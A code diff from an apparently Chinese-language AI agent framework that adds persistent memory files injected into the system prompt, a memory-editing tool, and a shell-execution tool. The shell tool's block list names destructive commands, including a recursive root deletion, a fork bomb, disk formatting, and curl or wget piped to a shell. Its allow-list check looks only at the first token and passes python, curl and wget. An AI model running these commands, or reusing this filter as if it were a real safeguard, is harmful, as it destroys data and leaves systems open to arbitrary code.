f.write("\n".join(env_lines) + "\n")
|
||||||
|
rprint(f" [green]Created:[/green] {env_path}")
|
||||||
|
|
||||||
|
# ── Step 4: Agent personality (optional) ──────────────────────
|
||||||
|
rprint("\n[bold]Step 4: Customize your Agent (optional)[/bold]")
|
||||||
|
rprint(" Press Enter to use defaults, or type your preferences.")
|
||||||
|
|
||||||
|
agent_name = Prompt.ask(" Agent name", default="AgentKit")
|
||||||
|
personality = Prompt.ask(" Personality", default="专业、友好、注重细节")
|
||||||
|
speaking_style = Prompt.ask(" Speaking style", default="简洁清晰")
|
||||||
|
|
||||||
|
# Create SOUL.md
|
||||||
|
from agentkit.memory.profile import MemoryStore
|
||||||
|
memory_store = MemoryStore(base_dir=Path.home() / ".agentkit")
|
||||||
|
soul_content = f"""## 身份
|
||||||
|
我是{agent_name},一个专业的 AI 助手。
|
||||||
|
|
||||||
|
## 性格
|
||||||
|
{personality}
|
||||||
|
|
||||||
|
## 说话方式
|
||||||
|
{speaking_style}
|
||||||
|
|
||||||
|
## 做事准则
|
||||||
|
- 准确回答用户问题
|
||||||
|
- 主动记住用户提到的偏好和信息
|
||||||
|
- 不确定时坦诚说明
|
||||||
|
"""
|
||||||
|
memory_store.get_file("soul").write(soul_content.strip())
|
||||||
|
rprint(f" [green]Created:[/green] ~/.agentkit/SOUL.md")
|
||||||
|
|
||||||
|
rprint(Panel(
|
||||||
|
"[bold green]Setup complete![/bold green]\n\n"
|
||||||
|
"You can now run:\n"
|
||||||
|
" [cyan]agentkit chat[/cyan] — Start chatting with your Agent\n"
|
||||||
|
" [cyan]agentkit serve[/cyan] — Start the API server",
|
||||||
|
border_style="green",
|
||||||
|
))
|
||||||
|
|
||||||
|
return str(config_path)
|
||||||
|
|
@ -14,6 +14,7 @@ from agentkit.memory.query_transformer import (
|
||||||
TransformedQuery,
|
TransformedQuery,
|
||||||
create_query_transformer,
|
create_query_transformer,
|
||||||
)
|
)
|
||||||
|
from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot
|
||||||
|
|
||||||
__all__ = [
|
__all__ = [
|
||||||
"Memory",
|
"Memory",
|
||||||
|
|
@ -29,4 +30,7 @@ __all__ = [
|
||||||
"NoOpQueryTransformer",
|
"NoOpQueryTransformer",
|
||||||
"TransformedQuery",
|
"TransformedQuery",
|
||||||
"create_query_transformer",
|
"create_query_transformer",
|
||||||
|
"MemoryFile",
|
||||||
|
"MemoryStore",
|
||||||
|
"MemorySnapshot",
|
||||||
]
|
]
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,294 @@
|
||||||
|
"""分层记忆系统 — SOUL/USER/MEMORY/DAILY 文件管理.
|
||||||
|
|
||||||
|
参考 Hermes/OpenClaw 架构,实现 Agent 人格、用户档案、工作笔记、
|
||||||
|
日志的持久化存储与 system prompt 注入。
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import re
|
||||||
|
from dataclasses import dataclass, field
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
|
||||||
|
class MemoryFile:
|
||||||
|
"""单个记忆文件的管理器,支持 section 级别 CRUD 和容量控制.
|
||||||
|
|
||||||
|
文件格式为 Markdown,使用 `## Section` 组织内容::
|
||||||
|
|
||||||
|
## 身份
|
||||||
|
我是小王,一个专业的 AI 助手。
|
||||||
|
|
||||||
|
## 性格
|
||||||
|
友好、耐心、注重细节
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, path: Path, char_budget: int | None = None):
|
||||||
|
self.path = Path(path)
|
||||||
|
self.char_budget = char_budget
|
||||||
|
|
||||||
|
def read(self) -> str:
|
||||||
|
"""读取整个文件内容,文件不存在返回空字符串."""
|
||||||
|
if not self.path.exists():
|
||||||
|
return ""
|
||||||
|
return self.path.read_text(encoding="utf-8")
|
||||||
|
|
||||||
|
def write(self, content: str) -> None:
|
||||||
|
"""写入内容,自动创建父目录,超容量时自动裁剪."""
|
||||||
|
self.path.parent.mkdir(parents=True, exist_ok=True)
|
||||||
|
self.path.write_text(content, encoding="utf-8")
|
||||||
|
if self.char_budget and len(content) > self.char_budget:
|
||||||
|
self.trim_to_budget()
|
||||||
|
|
||||||
|
def read_section(self, name: str) -> str:
|
||||||
|
"""读取指定 section 的内容(不含标题行)."""
|
||||||
|
content = self.read()
|
||||||
|
if not content:
|
||||||
|
return ""
|
||||||
|
# 匹配 ## name 后面的内容,直到下一个 ## 或文件末尾
|
||||||
|
pattern = rf"^## {re.escape(name)}\s*\n(.*?)(?=^## |\Z)"
|
||||||
|
match = re.search(pattern, content, re.MULTILINE | re.DOTALL)
|
||||||
|
if match:
|
||||||
|
return match.group(1).strip()
|
||||||
|
return ""
|
||||||
|
|
||||||
|
def add_section(self, name: str, content: str) -> None:
|
||||||
|
"""追加内容到指定 section,不存在则创建."""
|
||||||
|
existing = self.read()
|
||||||
|
section_content = self.read_section(name)
|
||||||
|
if section_content:
|
||||||
|
# 追加到已有 section
|
||||||
|
old_text = section_content
|
||||||
|
new_text = f"{old_text}\n{content}"
|
||||||
|
self.replace_section(name, old_text, new_text)
|
||||||
|
else:
|
||||||
|
# 创建新 section
|
||||||
|
new_section = f"\n## {name}\n{content}"
|
||||||
|
if existing and not existing.endswith("\n"):
|
||||||
|
new_section = "\n" + new_section
|
||||||
|
self.write(existing + new_section)
|
||||||
|
|
||||||
|
def replace_section(self, name: str, old_text: str, new_text: str) -> bool:
|
||||||
|
"""替换 section 内的文本,返回是否成功."""
|
||||||
|
section_content = self.read_section(name)
|
||||||
|
if old_text not in section_content:
|
||||||
|
return False
|
||||||
|
full_content = self.read()
|
||||||
|
# 替换 section 内的文本
|
||||||
|
pattern = rf"(^## {re.escape(name)}\s*\n)(.*?)(?=^## |\Z)"
|
||||||
|
match = re.search(pattern, full_content, re.MULTILINE | re.DOTALL)
|
||||||
|
if not match:
|
||||||
|
return False
|
||||||
|
original_section_body = match.group(2)
|
||||||
|
new_section_body = original_section_body.replace(old_text, new_text, 1)
|
||||||
|
updated = full_content[: match.start(2)] + new_section_body + full_content[match.end(2) :]
|
||||||
|
self.write(updated)
|
||||||
|
return True
|
||||||
|
|
||||||
|
def remove_section(self, name: str) -> None:
|
||||||
|
"""删除整个 section(含标题行)."""
|
||||||
|
content = self.read()
|
||||||
|
if not content:
|
||||||
|
return
|
||||||
|
pattern = rf"^## {re.escape(name)}\s*\n.*?(?=^## |\Z)"
|
||||||
|
new_content = re.sub(pattern, "", content, flags=re.MULTILINE | re.DOTALL).strip()
|
||||||
|
self.write(new_content)
|
||||||
|
|
||||||
|
def list_sections(self) -> list[str]:
|
||||||
|
"""列出所有 section 名称."""
|
||||||
|
content = self.read()
|
||||||
|
if not content:
|
||||||
|
return []
|
||||||
|
return re.findall(r"^## (.+)$", content, re.MULTILINE)
|
||||||
|
|
||||||
|
def trim_to_budget(self) -> None:
|
||||||
|
"""裁剪内容到容量上限,优先保留前面的 section."""
|
||||||
|
if not self.char_budget:
|
||||||
|
return
|
||||||
|
content = self.read()
|
||||||
|
if len(content) <= self.char_budget:
|
||||||
|
return
|
||||||
|
# 从末尾裁剪,保留前面的 section
|
||||||
|
self.write(content[: self.char_budget])
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass
|
||||||
|
class MemorySnapshot:
|
||||||
|
"""一次加载的所有记忆文件快照."""
|
||||||
|
|
||||||
|
soul: str = ""
|
||||||
|
user: str = ""
|
||||||
|
memory: str = ""
|
||||||
|
daily: str = ""
|
||||||
|
total_chars: int = 0
|
||||||
|
|
||||||
|
def is_empty(self) -> bool:
|
||||||
|
return not any([self.soul, self.user, self.memory, self.daily])
|
||||||
|
|
||||||
|
|
||||||
|
# 容量上限常量(字符数)
|
||||||
|
SOUL_BUDGET = 2000
|
||||||
|
USER_BUDGET = 1400
|
||||||
|
MEMORY_BUDGET = 2200
|
||||||
|
DAILY_BUDGET = 1000 # 每天日志上限
|
||||||
|
|
||||||
|
# 默认 SOUL.md 内容
|
||||||
|
DEFAULT_SOUL = """## 身份
|
||||||
|
我是 AgentKit,一个专业的 AI 助手。
|
||||||
|
|
||||||
|
## 性格
|
||||||
|
专业、友好、注重细节
|
||||||
|
|
||||||
|
## 说话方式
|
||||||
|
简洁清晰,偶尔使用比喻帮助理解
|
||||||
|
|
||||||
|
## 做事准则
|
||||||
|
- 准确回答用户问题
|
||||||
|
- 主动记住用户提到的偏好和信息
|
||||||
|
- 不确定时坦诚说明
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
class MemoryStore:
|
||||||
|
"""管理 SOUL/USER/MEMORY/DAILY 四类记忆文件.
|
||||||
|
|
||||||
|
存储路径::
|
||||||
|
|
||||||
|
base_dir/
|
||||||
|
├── SOUL.md
|
||||||
|
├── memories/
|
||||||
|
│ ├── USER.md
|
||||||
|
│ ├── MEMORY.md
|
||||||
|
│ └── daily/
|
||||||
|
│ ├── 2026-06-07.md
|
||||||
|
│ └── 2026-06-08.md
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, base_dir: Path | str | None = None):
|
||||||
|
if base_dir is None:
|
||||||
|
base_dir = Path.home() / ".agentkit"
|
||||||
|
self.base_dir = Path(base_dir)
|
||||||
|
self.base_dir.mkdir(parents=True, exist_ok=True)
|
||||||
|
|
||||||
|
# 初始化四个 MemoryFile
|
||||||
|
self._soul = MemoryFile(self.base_dir / "SOUL.md", char_budget=SOUL_BUDGET)
|
||||||
|
self._user = MemoryFile(self.base_dir / "memories" / "USER.md", char_budget=USER_BUDGET)
|
||||||
|
self._memory = MemoryFile(self.base_dir / "memories" / "MEMORY.md", char_budget=MEMORY_BUDGET)
|
||||||
|
self._daily_dir = self.base_dir / "memories" / "daily"
|
||||||
|
self._daily_dir.mkdir(parents=True, exist_ok=True)
|
||||||
|
|
||||||
|
def get_file(self, file_key: str) -> MemoryFile:
|
||||||
|
"""获取指定类型的 MemoryFile.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
file_key: "soul" | "user" | "memory" | "daily"
|
||||||
|
"""
|
||||||
|
mapping = {
|
||||||
|
"soul": self._soul,
|
||||||
|
"user": self._user,
|
||||||
|
"memory": self._memory,
|
||||||
|
}
|
||||||
|
if file_key in mapping:
|
||||||
|
return mapping[file_key]
|
||||||
|
if file_key == "daily":
|
||||||
|
# daily 返回今天的日志文件
|
||||||
|
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
|
||||||
|
return MemoryFile(self._daily_dir / f"{today}.md", char_budget=DAILY_BUDGET)
|
||||||
|
raise ValueError(f"Invalid file_key: {file_key}. Must be soul/user/memory/daily")
|
||||||
|
|
||||||
|
def ensure_defaults(self) -> None:
|
||||||
|
"""首次运行时创建默认 SOUL.md."""
|
||||||
|
if not self._soul.read():
|
||||||
|
self._soul.write(DEFAULT_SOUL.strip())
|
||||||
|
|
||||||
|
def load_all(self) -> MemorySnapshot:
|
||||||
|
"""加载所有记忆文件."""
|
||||||
|
soul = self._soul.read()
|
||||||
|
user = self._user.read()
|
||||||
|
memory = self._memory.read()
|
||||||
|
daily = self.load_daily_logs()
|
||||||
|
total = len(soul) + len(user) + len(memory) + len(daily)
|
||||||
|
return MemorySnapshot(
|
||||||
|
soul=soul,
|
||||||
|
user=user,
|
||||||
|
memory=memory,
|
||||||
|
daily=daily,
|
||||||
|
total_chars=total,
|
||||||
|
)
|
||||||
|
|
||||||
|
def load_daily_logs(self, days: int = 2) -> str:
|
||||||
|
"""加载最近 N 天的日志."""
|
||||||
|
parts: list[str] = []
|
||||||
|
for i in range(days):
|
||||||
|
from datetime import timedelta
|
||||||
|
|
||||||
|
date = datetime.now(timezone.utc) - timedelta(days=i)
|
||||||
|
filename = f"{date.strftime('%Y-%m-%d')}.md"
|
||||||
|
daily_file = MemoryFile(self._daily_dir / filename)
|
||||||
|
content = daily_file.read()
|
||||||
|
if content:
|
||||||
|
parts.append(f"### {date.strftime('%Y-%m-%d')}\n{content}")
|
||||||
|
return "\n\n".join(parts)
|
||||||
|
|
||||||
|
def archive_old_dailies(self, keep_days: int = 2) -> int:
|
||||||
|
"""归档超过 N 天的日志(删除旧文件)."""
|
||||||
|
from datetime import timedelta
|
||||||
|
|
||||||
|
count = 0
|
||||||
|
cutoff = datetime.now(timezone.utc) - timedelta(days=keep_days)
|
||||||
|
if not self._daily_dir.exists():
|
||||||
|
return 0
|
||||||
|
for f in self._daily_dir.glob("*.md"):
|
||||||
|
# 从文件名解析日期
|
||||||
|
try:
|
||||||
|
date_str = f.stem # e.g. "2026-06-07"
|
||||||
|
file_date = datetime.strptime(date_str, "%Y-%m-%d").replace(tzinfo=timezone.utc)
|
||||||
|
if file_date < cutoff:
|
||||||
|
f.unlink()
|
||||||
|
count += 1
|
||||||
|
except ValueError:
|
||||||
|
continue
|
||||||
|
return count
|
||||||
|
|
||||||
|
def build_system_prompt(self, snapshot: MemorySnapshot, base_prompt: str = "") -> str:
|
||||||
|
"""将记忆注入 system prompt.
|
||||||
|
|
||||||
|
格式::
|
||||||
|
|
||||||
|
<agent-identity>
|
||||||
|
[SOUL.md content]
|
||||||
|
</agent-identity>
|
||||||
|
|
||||||
|
<user-profile>
|
||||||
|
[USER.md content]
|
||||||
|
</user-profile>
|
||||||
|
|
||||||
|
<agent-notes>
|
||||||
|
[MEMORY.md content]
|
||||||
|
</agent-notes>
|
||||||
|
|
||||||
|
<recent-activity>
|
||||||
|
[DAILY.md content]
|
||||||
|
</recent-activity>
|
||||||
|
|
||||||
|
[base_prompt]
|
||||||
|
"""
|
||||||
|
parts: list[str] = []
|
||||||
|
|
||||||
|
if snapshot.soul:
|
||||||
|
parts.append(f"<agent-identity>\n{snapshot.soul}\n</agent-identity>")
|
||||||
|
if snapshot.user:
|
||||||
|
parts.append(f"<user-profile>\n{snapshot.user}\n</user-profile>")
|
||||||
|
if snapshot.memory:
|
||||||
|
parts.append(f"<agent-notes>\n{snapshot.memory}\n</agent-notes>")
|
||||||
|
if snapshot.daily:
|
||||||
|
parts.append(f"<recent-activity>\n{snapshot.daily}\n</recent-activity>")
|
||||||
|
|
||||||
|
if base_prompt:
|
||||||
|
parts.append(base_prompt)
|
||||||
|
|
||||||
|
return "\n\n".join(parts) if parts else base_prompt
|
||||||
|
|
@ -10,6 +10,9 @@ from agentkit.tools.web_crawl import WebCrawlTool
|
||||||
from agentkit.tools.schema_tools import SchemaExtractTool, SchemaGenerateTool
|
from agentkit.tools.schema_tools import SchemaExtractTool, SchemaGenerateTool
|
||||||
from agentkit.tools.baidu_search import BaiduSearchTool
|
from agentkit.tools.baidu_search import BaiduSearchTool
|
||||||
from agentkit.tools.ask_human import AskHumanTool
|
from agentkit.tools.ask_human import AskHumanTool
|
||||||
|
from agentkit.tools.memory_tool import MemoryTool
|
||||||
|
from agentkit.tools.shell import ShellTool
|
||||||
|
from agentkit.tools.web_search import WebSearchTool
|
||||||
|
|
||||||
# Conditional import: HeadroomRetrieveTool requires HeadroomCompressor
|
# Conditional import: HeadroomRetrieveTool requires HeadroomCompressor
|
||||||
try:
|
try:
|
||||||
|
|
@ -31,5 +34,8 @@ __all__ = [
|
||||||
"SchemaGenerateTool",
|
"SchemaGenerateTool",
|
||||||
"BaiduSearchTool",
|
"BaiduSearchTool",
|
||||||
"AskHumanTool",
|
"AskHumanTool",
|
||||||
|
"MemoryTool",
|
||||||
|
"ShellTool",
|
||||||
|
"WebSearchTool",
|
||||||
"HeadroomRetrieveTool",
|
"HeadroomRetrieveTool",
|
||||||
]
|
]
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,117 @@
|
||||||
|
"""MemoryTool — Agent 可在对话中读写记忆的工具.
|
||||||
|
|
||||||
|
操作:
|
||||||
|
- add: 追加内容到指定 section
|
||||||
|
- replace: 替换 section 内的文本
|
||||||
|
- remove: 删除整个 section
|
||||||
|
- read: 读取文件内容
|
||||||
|
|
||||||
|
file 参数: soul | user | memory | daily
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
from agentkit.memory.profile import MemoryStore
|
||||||
|
from agentkit.tools.base import Tool
|
||||||
|
|
||||||
|
|
||||||
|
VALID_FILES = {"soul", "user", "memory", "daily"}
|
||||||
|
VALID_ACTIONS = {"add", "replace", "remove", "read"}
|
||||||
|
|
||||||
|
|
||||||
|
class MemoryTool(Tool):
|
||||||
|
"""Agent 可调用的记忆操作工具.
|
||||||
|
|
||||||
|
让 Agent 在对话中读写 SOUL/USER/MEMORY/DAILY 记忆文件。
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, memory_store: MemoryStore):
|
||||||
|
super().__init__(
|
||||||
|
name="memory",
|
||||||
|
description="Read and write persistent memory files. Use to remember user preferences, project info, and notes across sessions.",
|
||||||
|
input_schema={
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"action": {
|
||||||
|
"type": "string",
|
||||||
|
"enum": list(VALID_ACTIONS),
|
||||||
|
"description": "Operation: add, replace, remove, read",
|
||||||
|
},
|
||||||
|
"file": {
|
||||||
|
"type": "string",
|
||||||
|
"enum": list(VALID_FILES),
|
||||||
|
"description": "Memory file: soul (agent identity), user (user profile), memory (work notes), daily (today's log)",
|
||||||
|
},
|
||||||
|
"section": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "Section name within the file (e.g. '项目信息', '偏好')",
|
||||||
|
},
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "Content to add or new text for replace",
|
||||||
|
},
|
||||||
|
"old_text": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "Text to find for replace action",
|
||||||
|
},
|
||||||
|
"new_text": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "Replacement text for replace action",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"required": ["action", "file"],
|
||||||
|
},
|
||||||
|
)
|
||||||
|
self._store = memory_store
|
||||||
|
|
||||||
|
async def execute(self, **kwargs) -> dict[str, Any]:
|
||||||
|
action = kwargs.get("action", "")
|
||||||
|
file_key = kwargs.get("file", "")
|
||||||
|
|
||||||
|
# Validate
|
||||||
|
if file_key not in VALID_FILES:
|
||||||
|
return {"success": False, "error": f"Invalid file: {file_key}. Must be one of {VALID_FILES}"}
|
||||||
|
if action not in VALID_ACTIONS:
|
||||||
|
return {"success": False, "error": f"Unknown action: {action}. Must be one of {VALID_ACTIONS}"}
|
||||||
|
|
||||||
|
try:
|
||||||
|
mf = self._store.get_file(file_key)
|
||||||
|
|
||||||
|
if action == "read":
|
||||||
|
content = mf.read()
|
||||||
|
return {"success": True, "content": content}
|
||||||
|
|
||||||
|
elif action == "add":
|
||||||
|
section = kwargs.get("section", "")
|
||||||
|
content = kwargs.get("content", "")
|
||||||
|
if not section:
|
||||||
|
return {"success": False, "error": "section is required for add action"}
|
||||||
|
mf.add_section(section, content)
|
||||||
|
return {"success": True, "message": f"Added to {file_key}/{section}"}
|
||||||
|
|
||||||
|
elif action == "replace":
|
||||||
|
section = kwargs.get("section", "")
|
||||||
|
old_text = kwargs.get("old_text", "")
|
||||||
|
new_text = kwargs.get("new_text", "")
|
||||||
|
if not section:
|
||||||
|
return {"success": False, "error": "section is required for replace action"}
|
||||||
|
if not old_text:
|
||||||
|
return {"success": False, "error": "old_text is required for replace action"}
|
||||||
|
success = mf.replace_section(section, old_text, new_text)
|
||||||
|
if not success:
|
||||||
|
return {"success": False, "error": f"old_text not found in {file_key}/{section}"}
|
||||||
|
return {"success": True, "message": f"Replaced in {file_key}/{section}"}
|
||||||
|
|
||||||
|
elif action == "remove":
|
||||||
|
section = kwargs.get("section", "")
|
||||||
|
if not section:
|
||||||
|
return {"success": False, "error": "section is required for remove action"}
|
||||||
|
mf.remove_section(section)
|
||||||
|
return {"success": True, "message": f"Removed {file_key}/{section}"}
|
||||||
|
|
||||||
|
return {"success": False, "error": f"Unhandled action: {action}"}
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
return {"success": False, "error": str(e)}
|
||||||
|
|
@ -0,0 +1,233 @@
|
||||||
|
"""ShellTool — 安全的命令行执行工具。
|
||||||
|
|
||||||
|
支持白名单命令、超时控制、工作目录设置。
|
||||||
|
默认白名单包含安全的只读命令,可通过配置扩展。
|
||||||
|
"""
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import logging
|
||||||
|
import shlex
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
from agentkit.tools.base import Tool
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
# Default allowed commands (safe, read-only)
|
||||||
|
DEFAULT_ALLOWED_COMMANDS: list[str] = [
|
||||||
|
"ls", "cat", "head", "tail", "wc", "find", "grep", "rg",
|
||||||
|
"git", "git log", "git diff", "git show", "git status", "git branch",
|
||||||
|
"python3", "python", "node", "npm", "pip", "pip3",
|
||||||
|
"echo", "pwd", "which", "whoami", "date", "uname",
|
||||||
|
"curl", "wget", # Network fetch (read-only)
|
||||||
|
"docker", "docker ps", "docker logs",
|
||||||
|
"pytest", "vitest", "jest", "make",
|
||||||
|
]
|
||||||
|
|
||||||
|
# Dangerous patterns that are always blocked
|
||||||
|
BLOCKED_PATTERNS: list[str] = [
|
||||||
|
"rm -rf /", "rm -rf /*", ":(){ :|:& };:",
|
||||||
|
"mkfs", "dd if=", "> /dev/sd", "chmod 777 /",
|
||||||
|
]
|
||||||
|
|
||||||
|
# Regex patterns for dangerous commands (more flexible matching)
|
||||||
|
import re
|
||||||
|
|
||||||
|
BLOCKED_REGEX_PATTERNS: list[re.Pattern[str]] = [
|
||||||
|
re.compile(r"curl\s.*\|\s*sh", re.IGNORECASE),
|
||||||
|
re.compile(r"curl\s.*\|\s*bash", re.IGNORECASE),
|
||||||
|
re.compile(r"wget\s.*\|\s*sh", re.IGNORECASE),
|
||||||
|
re.compile(r"wget\s.*\|\s*bash", re.IGNORECASE),
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
class ShellTool(Tool):
|
||||||
|
"""安全的命令行执行工具。
|
||||||
|
|
||||||
|
特性:
|
||||||
|
- 白名单命令过滤(可配置)
|
||||||
|
- 超时控制(默认 30 秒)
|
||||||
|
- 工作目录设置
|
||||||
|
- 危险命令拦截
|
||||||
|
- 输出截断(防止 token 膨胀)
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(
|
||||||
|
self,
|
||||||
|
name: str = "shell",
|
||||||
|
description: str = "执行命令行命令。支持白名单内的安全命令,有超时控制。",
|
||||||
|
input_schema: dict[str, Any] | None = None,
|
||||||
|
output_schema: dict[str, Any] | None = None,
|
||||||
|
version: str = "1.0.0",
|
||||||
|
tags: list[str] | None = None,
|
||||||
|
allowed_commands: list[str] | None = None,
|
||||||
|
default_timeout: int = 30,
|
||||||
|
max_output_length: int = 10000,
|
||||||
|
working_dir: str | None = None,
|
||||||
|
allow_all: bool = False,
|
||||||
|
):
|
||||||
|
super().__init__(
|
||||||
|
name=name,
|
||||||
|
description=description,
|
||||||
|
input_schema=input_schema or self._default_input_schema(),
|
||||||
|
output_schema=output_schema or self._default_output_schema(),
|
||||||
|
version=version,
|
||||||
|
tags=tags or ["shell", "system"],
|
||||||
|
)
|
||||||
|
self._allowed_commands = allowed_commands or DEFAULT_ALLOWED_COMMANDS
|
||||||
|
self._default_timeout = default_timeout
|
||||||
|
self._max_output_length = max_output_length
|
||||||
|
self._working_dir = working_dir
|
||||||
|
self._allow_all = allow_all
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _default_input_schema() -> dict[str, Any]:
|
||||||
|
return {
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"command": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "要执行的命令",
|
||||||
|
},
|
||||||
|
"timeout": {
|
||||||
|
"type": "integer",
|
||||||
|
"description": "超时秒数(默认 30)",
|
||||||
|
"default": 30,
|
||||||
|
},
|
||||||
|
"working_dir": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "工作目录(可选)",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"required": ["command"],
|
||||||
|
}
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _default_output_schema() -> dict[str, Any]:
|
||||||
|
return {
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"stdout": {"type": "string", "description": "标准输出"},
|
||||||
|
"stderr": {"type": "string", "description": "标准错误"},
|
||||||
|
"exit_code": {"type": "integer", "description": "退出码"},
|
||||||
|
"success": {"type": "boolean", "description": "是否成功(exit_code == 0)"},
|
||||||
|
"timed_out": {"type": "boolean", "description": "是否超时"},
|
||||||
|
"error": {"type": "string", "description": "错误信息(仅失败时)"},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
def _is_command_allowed(self, command: str) -> tuple[bool, str]:
|
||||||
|
"""检查命令是否在白名单内。"""
|
||||||
|
command_lower = command.lower().strip()
|
||||||
|
|
||||||
|
# Block dangerous patterns first (even in allow_all mode)
|
||||||
|
for pattern in BLOCKED_PATTERNS:
|
||||||
|
if pattern in command_lower:
|
||||||
|
return False, f"Blocked dangerous pattern: {pattern}"
|
||||||
|
|
||||||
|
for regex in BLOCKED_REGEX_PATTERNS:
|
||||||
|
if regex.search(command_lower):
|
||||||
|
return False, f"Blocked dangerous pattern: {regex.pattern}"
|
||||||
|
|
||||||
|
if self._allow_all:
|
||||||
|
return True, ""
|
||||||
|
|
||||||
|
# Extract the base command (first token)
|
||||||
|
try:
|
||||||
|
tokens = shlex.split(command)
|
||||||
|
except ValueError:
|
||||||
|
return False, "Invalid command syntax"
|
||||||
|
|
||||||
|
if not tokens:
|
||||||
|
return False, "Empty command"
|
||||||
|
|
||||||
|
base = tokens[0]
|
||||||
|
# Also check two-word prefixes like "git log", "docker ps"
|
||||||
|
two_word = f"{base} {tokens[1]}" if len(tokens) > 1 else ""
|
||||||
|
|
||||||
|
for allowed in self._allowed_commands:
|
||||||
|
if base == allowed or two_word == allowed:
|
||||||
|
return True, ""
|
||||||
|
|
||||||
|
return False, f"Command '{base}' not in allowed list. Allowed: {', '.join(sorted(set(self._allowed_commands)))}"
|
||||||
|
|
||||||
|
async def execute(self, **kwargs) -> dict:
|
||||||
|
"""执行命令行命令。"""
|
||||||
|
command = kwargs.get("command")
|
||||||
|
if not command:
|
||||||
|
return {"error": "command 参数是必需的", "success": False}
|
||||||
|
|
||||||
|
timeout = kwargs.get("timeout", self._default_timeout)
|
||||||
|
working_dir = kwargs.get("working_dir", self._working_dir)
|
||||||
|
|
||||||
|
# Security check
|
||||||
|
allowed, reason = self._is_command_allowed(command)
|
||||||
|
if not allowed:
|
||||||
|
return {
|
||||||
|
"error": f"Command not allowed: {reason}",
|
||||||
|
"success": False,
|
||||||
|
"stdout": "",
|
||||||
|
"stderr": "",
|
||||||
|
"exit_code": -1,
|
||||||
|
"timed_out": False,
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
proc = await asyncio.create_subprocess_shell(
|
||||||
|
command,
|
||||||
|
stdout=asyncio.subprocess.PIPE,
|
||||||
|
stderr=asyncio.subprocess.PIPE,
|
||||||
|
cwd=working_dir,
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
stdout_bytes, stderr_bytes = await asyncio.wait_for(
|
||||||
|
proc.communicate(),
|
||||||
|
timeout=timeout,
|
||||||
|
)
|
||||||
|
timed_out = False
|
||||||
|
except asyncio.TimeoutError:
|
||||||
|
proc.kill()
|
||||||
|
await proc.wait()
|
||||||
|
return {
|
||||||
|
"stdout": "",
|
||||||
|
"stderr": f"Command timed out after {timeout}s",
|
||||||
|
"exit_code": -1,
|
||||||
|
"success": False,
|
||||||
|
"timed_out": True,
|
||||||
|
}
|
||||||
|
|
||||||
|
stdout = stdout_bytes.decode("utf-8", errors="replace")
|
||||||
|
stderr = stderr_bytes.decode("utf-8", errors="replace")
|
||||||
|
|
||||||
|
# Truncate output if too long
|
||||||
|
truncated = False
|
||||||
|
if len(stdout) > self._max_output_length:
|
||||||
|
stdout = stdout[:self._max_output_length] + f"\n... [truncated, {len(stdout)} chars total]"
|
||||||
|
truncated = True
|
||||||
|
if len(stderr) > self._max_output_length:
|
||||||
|
stderr = stderr[:self._max_output_length] + f"\n... [truncated, {len(stderr)} chars total]"
|
||||||
|
truncated = True
|
||||||
|
|
||||||
|
result: dict[str, Any] = {
|
||||||
|
"stdout": stdout,
|
||||||
|
"stderr": stderr,
|
||||||
|
"exit_code": proc.returncode or 0,
|
||||||
|
"success": (proc.returncode or 0) == 0,
|
||||||
|
"timed_out": False,
|
||||||
|
}
|
||||||
|
if truncated:
|
||||||
|
result["truncated"] = True
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"ShellTool execution failed: {command} - {e}")
|
||||||
|
return {
|
||||||
|
"error": str(e),
|
||||||
|
"stdout": "",
|
||||||
|
"stderr": str(e),
|
||||||
|
"exit_code": -1,
|
||||||
|
"success": False,
|
||||||
|
"timed_out": False,
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,254 @@
|
||||||
|
"""WebSearchTool — 通用网页搜索工具。
|
||||||
|
|
||||||
|
支持多种搜索后端,按优先级自动降级:
|
||||||
|
1. Tavily API(需要 API key,质量最好)
|
||||||
|
2. Serper API(需要 API key,Google 搜索结果)
|
||||||
|
3. DuckDuckGo Lite(免费,无需 API key,降级方案)
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import re
|
||||||
|
import urllib.parse
|
||||||
|
from typing import Any
|
